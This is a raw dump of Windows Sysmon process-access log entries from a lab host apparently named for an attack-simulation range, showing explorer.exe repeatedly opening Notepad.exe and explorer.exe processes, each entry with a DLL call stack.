22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696538Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696537Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696536Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696535Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696534Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696533Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696532Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696531Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696530Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696529Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696528Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696527Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696526Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696525Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696524Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696523Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696522Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696521Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696520Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696519Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696518Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696517Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696516Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696515Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696514Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696513Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696512Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696511Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 